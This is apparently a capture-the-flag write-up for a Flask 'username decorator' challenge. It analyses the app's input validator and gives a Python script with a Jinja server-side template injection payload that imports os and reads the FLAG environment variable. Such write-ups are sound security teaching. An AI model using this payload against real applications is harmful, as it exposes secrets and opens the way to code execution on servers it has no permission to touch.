Username Decorator
Description
Author: JW/Mani
My favorite social media platform, Prorope, has overhauled their username system and now supports prefixes and suffixes! Isn't that so cool?
For one, I know that I would really love to be the !! JW !!, so I made a website to preview these username changes.
Note: the flag is in an environment variable called FLAG
Analysis
app.config['FLAG_LOCATION'] = 'os.getenv("FLAG")'def validate_username(username):
return bool(re.fullmatch("[a-zA-Z0-9._\[\]\(\)\-=,]{2,}", username))Validator only allows alphanumerical characters, dot, underscore, brackets, dash, equals sign, comma.
if request.method == 'POST':
prefix = (request.form['prefix'] or '')[:2]
username = request.form['username'] or ''
suffix = (request.form['suffix'] or '')[:2]If request type is post, then prefix, username and suffix can be set. Prefix and suffix can only be input's 2 characters, but username is not limited to length.
Since application is written in Python it's most likely is using Jinja as web template. From challenge description it looks like we can perform Server Side Template Injection
Solution
import requests
from bs4 import BeautifulSoup as BS
URL = 'http://<SERVER>:<PORT>/'
# URL = 'http://127.0.0.1:5000' # Emulate server to test locally
data = {
'prefix': '{{',
'suffix': '}}',
'username': 'config.__class__.from_envvar.__globals__.__builtins__.__import__(request.args.a).getenv(request.args.b)'
}
params = { "a": "os", "b": "FLAG" }
resp = requests.post(URL, data=data, params=params)
html = BS(resp.text, 'html.parser')
print(html.prettify())Last updated